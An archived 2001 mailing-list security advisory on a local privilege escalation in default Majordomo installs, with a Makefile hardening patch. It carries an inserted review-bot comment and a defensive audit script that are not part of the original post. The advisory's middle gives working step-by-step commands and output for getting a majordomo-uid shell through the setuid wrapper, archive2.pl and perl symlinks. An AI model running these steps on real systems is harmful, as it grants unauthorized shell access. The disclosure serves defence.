Majordomo default vulns

From: Marco van Berkum (m.v.berkumat_private)
Date: Fri Sep 14 2001 - 02:24:27 PDT

    Hi,
    I found something to discuss, this time involving majordomo. 
    This was tested on a Slackware Linux 8.0 (kernel 2.4.8); 
    majordomo version 1.94.4. I also tested the other versions 
    and all _default_ installs had the same problem; note that 
    the versions 1.94.1 and 1.94.2 should NOT be used anymore, 
    those are way simpler to exploit. 
    
    We all know that if you install majordomo you should 
    CAREFULLY read the INSTALL file, simply because otherwise 
    you will have a security problem. Only, I doubt that everyone 
    actually follows the guidelines. Besides that, I feel that 
    the Majordomo developers _could_ make a more secure default 
    install without affecting the functionality of the program. 
    A simple patch would _at least_ stop the possibilities which 
    are described below. 
    
    Also, I did not find in the documents that majordomo should 
    have a shell (so give it nologin or whatever, it works fine 
    without a shell). 
    
    An example: 
    
    Who am I 
    marco@anubis:~$ id -a 
    uid=1001(marco) gid=100(users) groups=100(users) 
    
    This could happen if you give it a /home/majordomo 
    
    marco@anubis:~$ ls -al /home/|grep majordomo 
    drwxr-x--x    6 majordom daemon       4096 Sep 13 23:50 majordomo/ 
    
    Suid bit + executable for everyone (this is where the patch comes in) 
    
    marco@anubis:~$ ls -al ~majordomo/wrapper 
    -rwsr-xr-x    1 root     daemon      16451 Aug 31 13:51 /home/majordomo/wrapper* 
    
    This is the program I'm going to abuse 
    
    marco@anubis:~$ ls -al ~majordomo/archive2.pl 
    -rwxr-xr-x    1 majordom daemon       5234 Aug 31 13:51 /home/majordomo/archive2.pl* 
    
    Make a template 
    
    marco@anubis:~$ echo "ln -s /bin/sh ~/majordomo/sh 2>/dev/null">test 
    
    Append your template to majordomo's .bash_profile (or .profile etc.) 
    using the buggy archive2.pl (yes, it is not wrapper that is buggy here 
    but archive2.pl, which accepts /'s; I need wrapper for becoming user 
    majordomo though). 
    
    marco@anubis:~$ ~majordomo/wrapper archive2.pl -f .bash_profile -a ~marco/test 
    
    Now hit the .bash_profile (sometimes the majordomo admin might need it 
    and do the same). 
    
    marco@anubis:~$ su - majordomo 
    Password: 
    majordomo@anubis:~$ id -a 
    uid=666(majordomo) gid=2(daemon) groups=2(daemon) 
    majordomo@anubis:~$ exit 
    
    See if it worked 
    
    marco@anubis:~$ ls -al ~majordomo/sh 
    lrwxrwxrwx    1 majordom daemon          7 Sep 13 23:57 /home/majordomo/sh -> /bin/sh* 
    
    Yup, it worked; now someone could abuse it, let's do that. 
    
    marco@anubis:~$ ~majordomo/wrapper sh 
    sh-2.05$ id -a 
    uid=666(majordomo) gid=2(daemon) groups=100(users) 
    sh-2.05$ 
    
    Ok, I'm majordomo. 
    
    Also, the README file describes how one could debug majordomo. 
    
    <quote> 
    Finally, if you're up to mucking around in the perl code, symlinking 
    perl into ~majordomo and invoking it via wrapper will give you a debug 
    environment with Majordomo's permissions and view of the world: 
    
                    ~majordomo% ./wrapper perl -d majordomo 
    </quote> 
    
    Well, same problem :) 
    Don't forget to remove the symlink, or else everyone can do this: 
    
    marco@anubis:~$ /home/majordomo/wrapper perl 
    system("/bin/sh"); 
    ^D 
    sh-2.04$ 
    
    One could of course append to the perl files to make them execute your 
    evil code, since the archive2 program appends. This could give a 
    majordomo uid/daemon gid shell. 
    
    The main point here is that we can write to majordomo-owned files to 
    simply alter data in the lists or score a shell (and obtain a daemon 
    gid). 
    Reading the INSTALL file carefully will help you to prevent this, but I 
    prefer to apply a patch before starting the installation to make sure 
    that the wrapper is not executable for everyone (it _should_ have 4750 
    and not 4755). 
    
    --- simple patch to make default install more secure --- 
    
    --- Makefile.orig       Fri Sep 14 09:43:45 2001 
    +++ Makefile    Fri Sep 14 09:44:20 2001 
    @@ -42,7 +42,7 @@ 
     # change these values! 
     WRAPPER_OWNER = root 
     WRAPPER_GROUP = $(W_GROUP) 
    -WRAPPER_MODE = 4755 
    +WRAPPER_MODE = 4750 
     POSIX = -DPOSIX_UID=$(W_USER) -DPOSIX_GID=$(W_GROUP) 
     # Otherwise, if your system is NOT POSIX (e.g. SunOS 4.x, SGI Irix 4, 
     # HP DomainOS) then comment out the above four lines and uncomment 
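    Review bot: changing WRAPPER_MODE to 4750 only restricts the wrapper as far as WRAPPER_GROUP, set from $(W_GROUP) two lines above in the same hunk, is restricted: every member of that group can still run the root-setuid wrapper, so the existing "# change these values!" comment should state explicitly that W_GROUP must be a group limited to the MTA and the Majordomo admin rather than a broad system group. It is also worth a line in the patch description that this is a hardening of the default install and does not change archive2.pl's acceptance of arbitrary paths, which is the bug the post actually exercises.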
    
    just my 2 cents, 
    grtz, 
    Marco van Berkum 
    -- 
    GCC dpu s:--- a- C+++ US++++ P++ L+++ E---- W N o-- K w---
    O- M-- V-- PS+++ PE-- Y+ PGP--- t--- 5 X R* tv++ b+++ DI-- D----
    G++ e- h+ r y*
    +---------------------+------------------+-------------------+
    |  Marco van Berkum   |   MB17300-RIPE   | Security Engineer |
    |  http://ws.obit.nl  | "Chernobyl used  | Network Admin     |
    |  m.v.berkumat_private |     Windows"     |      UNIX         |
    +---------------------+------------------+-------------------+
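An audit script for the two default-install weaknesses the post describes (a world-executable setuid wrapper and interpreter symlinks inside ~majordomo), plus the login-shell point; this is added here as an example and is not code from the post or from Majordomo, and it assumes a POSIX sh with `find` and `readlink` available.

```shell
#!/bin/sh
# Audit a Majordomo home directory for the default-install weaknesses
# discussed in the post. Each check prints one FINDING line per problem
# and nothing when the check passes. Constructed example, not Majordomo's
# own code; assumes POSIX sh plus find(1) and readlink(1).

# The setuid wrapper must not be executable by everyone (4755);
# the post's Makefile patch makes it 4750.
check_wrapper() {
    w="$1/wrapper"
    [ -e "$w" ] || return 0
    # -perm -4001: setuid bit AND other-execute bit are both set
    if [ -n "$(find "$w" -perm -4001 -print)" ]; then
        echo "FINDING: $w is setuid and executable by everyone"
    fi
}

# A symlink inside ~majordomo that resolves to a shell or to perl gives
# anyone who can run the wrapper an interpreter with Majordomo's uid/gid
# (the ~majordomo/sh and ~majordomo/perl cases from the post).
check_interpreter_links() {
    find "$1" -type l | while read -r link; do
        target=$(readlink "$link")
        case "$(basename "$target")" in
            sh|bash|ksh|csh|tcsh|zsh|perl|perl5*)
                echo "FINDING: $link -> $target (interpreter runnable via wrapper)" ;;
        esac
    done
}

# The majordomo account needs no interactive shell. $2 is a passwd-format
# file (default /etc/passwd) so the check can also run against a copy.
check_login_shell() {
    user="$1"; passwd="${2:-/etc/passwd}"
    line=$(grep "^$user:" "$passwd") || return 0
    shell=${line##*:}          # 7th field; empty means /bin/sh by default
    case "$shell" in
        */nologin|*/false) ;;
        *) echo "FINDING: $user has login shell '${shell:-/bin/sh (default)}'" ;;
    esac
}

# Run every check: $1 = majordomo home, $2 = account name, $3 = passwd file.
audit_majordomo() {
    check_wrapper "$1"
    check_interpreter_links "$1"
    check_login_shell "${2:-majordomo}" "${3:-/etc/passwd}"
}
```

Run it as `audit_majordomo /home/majordomo majordomo`; an empty result means all three checks passed.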
    
    This archive was generated by hypermail 2b30 : Fri Sep 14 2001 - 17:11:34 PDT